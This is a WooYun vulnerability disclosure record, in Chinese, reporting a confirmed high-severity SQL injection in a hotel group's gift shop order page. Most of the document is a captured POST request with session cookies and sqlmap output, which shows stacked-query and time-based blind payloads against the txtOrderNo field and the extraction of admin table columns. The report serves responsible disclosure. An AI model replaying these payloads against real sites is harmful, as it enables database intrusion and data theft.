乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-04: 细节已通知厂商并且等待厂商处理中 2015-05-04: 厂商已经确认,细节仅向厂商公开 2015-05-14: 细节向核心白帽子及相关领域专家公开 2015-05-24: 细节向普通白帽子公开 2015-06-03: 细节向实习白帽子公开 2015-06-18: 细节向公众公开
一个很难过的注入
code>http://mygifts.plateno.com/PersonalCenter/MyOrderList.aspx</code>这里是他的商城,审核注意他的注入是post注入:
POST /PersonalCenter/MyOrderList.aspx HTTP/1.1Host: mygifts.plateno.comProxy-Connection: keep-aliveContent-Length: 1360Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://mygifts.plateno.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://mygifts.plateno.com/PersonalCenter/MyOrderList.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: utag_main=v_id:014cbd87f7ac00235f3fee2e4bf01f065001c05d00876$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1429110765616$ses_id:1429108946860%3Bexp-session; bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDWuLLIYaigN4h6aMhDfebFAqaoHzvpqNNoh%2BYtJvK5BkSZZhc7fq019lkUxgRJHU3ugt%2FSlOlBzwLB8JK1RXYh1OOmqUu1J3E5ID%2FOyDp%2Br%2BXDHGSSsxnXiCW%2FtMkD%2BsCyQ8q0YWEa9j3GxeUyihfg2TuI3NMuPRczR%2BPJumPvuk%3D; user=103137794%7C5; loginStatus=2015%2F04%2F28%2001%3A00%3A18%7Ctrue; Hm_lvt_39cd07a8ec3f1a319296c92d8a2f25c8=1430197102,1430197167,1430197199,1430199215; Hm_lpvt_39cd07a8ec3f1a319296c92d8a2f25c8=1430199404; ASP.NET_SessionId=canjwr55dxivbqfb21rdtoyv; CheckCode=660F; s_cc=true; svid=BDB8E2029D61E5DA; s_sq=plateno-prd%3D%2526pid%253Dmygifts.plateno.com%25252FDefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmygifts.plateno.com%25252FLogin.aspx%2526ot%253DA; url=/PersonalCenter/MyOrderList.aspx; .ASPXAUTH=6FDD224E42B399990B3F65E9C006CD85F166EA0AAB3D0AD3AC485485ABB567727025FC062E57F17D94398A0F5F4D9D5A25C955526760DE273FB141D7687099C7534DB34A585B72CDC0ADF7CA7ACA6D2E6DDDCF3FDA6493458FECE475B43C27B8EBC1671BA20244459BBDC70399A25896031562C3; CNZZDATA1253955047=486448934-1428939919-http%253A%252F%252Ffofa.so%252F%7C1430222980__EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=soVAJyOHH7hzDL%2BNRpmUPrnCD%2FSNR2KqJkCOTFC%2B2Tlu%2FrS%2FkjWTlA%2BC4HLALZkAkhe%2Bn2I2tKJr2pl0La0gfHoWRaM%2B2xTUcjJTe3ImuinoM6sgV8RWQt0QsOCk%2BJ4mCLRO%2BropVC8YU0ni3Bi77Bi8BIgCrmn2xnxQ7GCpI%2FBmPFcTzbRGqOFljMZlghKKg%2BdMIP101nvUP54XSmAQuorOzh6DR0aE8adu0nN%2B4qBGhjRoM7smHzWjmp6xjZ6r%2BJHv6B3B9TEZSyKjPoF1g5Z8hV8%2FSUg5%2FV%2FuaOqsHLBYuzfEThxwWQHcbdNfTQ0v5HzShhE0HEYit4%2BpktuENZck%2BJ%2Bn0wP4UkuBudNHBdY0L10dxnvdA2Cvgd5Hq53KhixWqZCGkWPqKOuDyQKveVX6TYZSHKtEGb%2F2y6Zs4gFv%2Bkt5rcvIFGpWcF93eI9Ui9%2BZSEHnxhTD3UGh8B9zah5V82dLrsjlzcHmTzY%2B6cQLp4RVCLWInKUZMwkxw2as%2BcNwTy9f3jpdY5lC%2Bw3n6Rv44wAOgWkeF%2B6AlBTvPhm533uy4lpEnxVKPfDYLiYTQsc0I9pSoJUVlhK%2BiNdXTMXgDXXaAjqYX6X%2FRFy0%2BXkv53o3l40CkOSWZh%2BvNEoFMasxGXVam3i6V%2BoXrF8%2B2IOtPYstxGb36hv0Vh9qweLSoSxB%2BnGbfmLoQPJhwqCjdHykn1dWQrUOvCHP9tmId1Kzx7CQtpg%2Bgy9eV9UWfEofDuybyTdz1ciPi%2BnNSsHUCLTDB4Hu4SXOEZzIIkqA8Lgrr0ewnU%2B2u%2FlAEsLiEx6z77oOpMDb6FTGiZD9owFcAWXLcHQOe2Sw8DXxxoUyLAKdbz1iFvp42mRDSAbE5DVw53k17MhCwBtDvI0%2BZebuwzEv7U8x2Cn7X9X08DdVbBZV94k%3D&__EVENTVALIDATION=uCu2e2tjF4nprAv8XEu9DGyJNjfM7vZdzWj0Oo4seZyTh20ypkJF2D3Zol%2F0GYfj3nA1Bn9CaXyUkRRUo4QkEiBBEkR049t8pMEUXIHuNRpFRmp9LN0%2BVUiG1GppQfNvAk%2Bu2j%2FNNlCfon3Olrn7aRK2MZQEQwClQ4FthSMsoM8sejSJyqSQsUxV0gM%3D&txtOrderNo=111&txtGoodsName=54645&txtTime1=2015-04-01&txtTime2=2015-04-09&ddlState=0
注入类型:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txtOrderNo (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=7GR6HbtkNjBe9X/ScMAoWH2ytuTYsmxi1VMl7AT/hSkar2k0vYzzjCbqUdtlAU4Zl71xYE7Xi76XzOVXhfvz06LhJzLrquOEgG1ZeCkOXvRsUWlj4BJZWQdtTQwhoqH4M6vM62GDJDtywySLDQVg3FEBq0rcUGZM+jFfy5BJcw8TDoNjaQ5WqbCUlvN26iwBW9VV56z6YMImXgX1LjbJfcOvmfhxgS+wAWbFizqE2pk6oXHMhp98zaSsfVkXH71D6nQ/9evyuhIlBXONlQ7BHLmtsEcJ/VbhcVwsfHCfYn45ElWXUlFthXlnWb5HAUrrXPXqx69HPHo7U761ysqJRtCobh9Vo37F93oxTKDKXzeAsEFo9kATi8TcROdszR9G3q6BQvPkFi/Q9a/bCKviGANDQnxgnpcVLgDg6C8FM8rmo3Mr7dEO392Gq0fHhHtvI1Wu9TLO2Zwud2oG8hAcLZmXSNcv6L7y/jCfXogLw3ss+lrpCLenlAGHnecdaFGKLkopvICGirIhVbjffQQ8/1jX6959Penc+q/SSTN9wAiws8VIOvbVQGMhkaK3fUrVjYMgKIkC2UNHjgQ6jnb0jC5tfZJNpsl3NGBw8OTdUasGwtki9J9u7JIEz2J/vXT8qEKVodS14GNt5hk2/mx/8bNLW+WzgWk8rd4ZB6ClAu26B3mfZNrXqq6CgZQ8bG86YjAFEdrVJaTk5P54rxJZfeY+SkTG26D51K3JxHkIJoNebRRZREtgTy+eENh6gVHvG5MCOPMb0b/e3fjX+9Hkn4tlKkLojNiWMUkh/GoSCxg6VGaX5NZOCRgDN6h3ZSixKdBouLE8x6zw1R8WttiNyxskAmu6MCeCHx2qfgdCbEB6C0r7Foi4IexREVCD8NVdtgbQdWn9E4fj/JRK&__EVENTVALIDATION=cnvD41ZFVOnC1hhnLJk0NEaxRpNfGZ0XdKcpqOasrUBhQMBiZDkiw3ncE9aHM+wx2XeNxCg8OHtWAFnVhGyGAhxYr/QYeIZATGrCMex+sJasIoIS1069vP/7NaJhABjjM7mJZ9upH2moz6zEW6V/2Ubc2K/805osrkRba05FMupb7a9jsRVfdyqSFf8=&txtOrderNo=111'; WAITFOR DELAY '0:0:5'--&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-08&ddlState=0 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=7GR6HbtkNjBe9X/ScMAoWH2ytuTYsmxi1VMl7AT/hSkar2k0vYzzjCbqUdtlAU4Zl71xYE7Xi76XzOVXhfvz06LhJzLrquOEgG1ZeCkOXvRsUWlj4BJZWQdtTQwhoqH4M6vM62GDJDtywySLDQVg3FEBq0rcUGZM+jFfy5BJcw8TDoNjaQ5WqbCUlvN26iwBW9VV56z6YMImXgX1LjbJfcOvmfhxgS+wAWbFizqE2pk6oXHMhp98zaSsfVkXH71D6nQ/9evyuhIlBXONlQ7BHLmtsEcJ/VbhcVwsfHCfYn45ElWXUlFthXlnWb5HAUrrXPXqx69HPHo7U761ysqJRtCobh9Vo37F93oxTKDKXzeAsEFo9kATi8TcROdszR9G3q6BQvPkFi/Q9a/bCKviGANDQnxgnpcVLgDg6C8FM8rmo3Mr7dEO392Gq0fHhHtvI1Wu9TLO2Zwud2oG8hAcLZmXSNcv6L7y/jCfXogLw3ss+lrpCLenlAGHnecdaFGKLkopvICGirIhVbjffQQ8/1jX6959Penc+q/SSTN9wAiws8VIOvbVQGMhkaK3fUrVjYMgKIkC2UNHjgQ6jnb0jC5tfZJNpsl3NGBw8OTdUasGwtki9J9u7JIEz2J/vXT8qEKVodS14GNt5hk2/mx/8bNLW+WzgWk8rd4ZB6ClAu26B3mfZNrXqq6CgZQ8bG86YjAFEdrVJaTk5P54rxJZfeY+SkTG26D51K3JxHkIJoNebRRZREtgTy+eENh6gVHvG5MCOPMb0b/e3fjX+9Hkn4tlKkLojNiWMUkh/GoSCxg6VGaX5NZOCRgDN6h3ZSixKdBouLE8x6zw1R8WttiNyxskAmu6MCeCHx2qfgdCbEB6C0r7Foi4IexREVCD8NVdtgbQdWn9E4fj/JRK&__EVENTVALIDATION=cnvD41ZFVOnC1hhnLJk0NEaxRpNfGZ0XdKcpqOasrUBhQMBiZDkiw3ncE9aHM+wx2XeNxCg8OHtWAFnVhGyGAhxYr/QYeIZATGrCMex+sJasIoIS1069vP/7NaJhABjjM7mJZ9upH2moz6zEW6V/2Ubc2K/805osrkRba05FMupb7a9jsRVfdyqSFf8=&txtOrderNo=111' WAITFOR DELAY '0:0:5'--&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-08&ddlState=0---[21:34:09] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[21:34:09] [INFO] fetching columns for table 'Admin' in database 'jfsc'
<然后就是跑表:管理啥的e
网速差跑了半天还在跑。。。大家注意吗,如果出现这个:
就要重新抓包,他的cookies有时间限制,过多久就要重新登入
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-05-04 15:58
洞主好厉害,还好这个站是隔离的,不过同时让我们发现了另外一个问题,多谢。
暂无